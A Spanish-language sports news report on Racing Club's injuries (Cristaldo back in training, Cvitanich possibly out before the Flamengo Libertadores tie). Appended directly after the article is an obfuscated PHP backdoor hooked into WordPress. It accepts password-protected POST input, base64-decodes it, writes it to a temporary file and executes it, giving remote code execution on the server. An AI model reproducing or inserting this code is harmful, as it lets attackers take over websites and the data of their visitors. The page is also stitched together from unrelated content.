Racing recuperó un delantero y perdió a otro

Cvitanich lesionado
Foto: Prensa Racing Club

El entrenamiento de Racing Club dejó hoy un sabor agridulce para Sebastián Beccacece, ya que recuperó a un delantero, pero perdió a otro y hay uno más que sigue entre algodones.

La buena del día fue que Jonatan Cristaldo superó una lesión en uno de sus isquiotibiales y trabajó a la par de sus compañeros.

La contracara de esa situación la trajo Darío Cvitanich, quien debió abandonar la práctica con dolor en el aductor derecho y será sometido a estudios, ya que podría haberse desgarrado. Si se confirmara esa lesión, estará aproximadamente tres semanas fuera de las canchas y llegaría muy justo a la serie ante Flamengo, por los octavos de final de la Copa Libertadores.

El que sigue moviéndose diferenciado por una pubalgia es Nicolás Reniero, así que habrá que ver si lo arriesgan en la primera fecha de la Copa Liga Profesional de Fútbol, teniendo en cuenta que dentro de un mes el equipo se jugará la continuidad en el máximo torneo a nivel continental.

Alexis Soto sigue recuperándose de un desgarro y lo propio hace Julián López de una lesión muscular.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}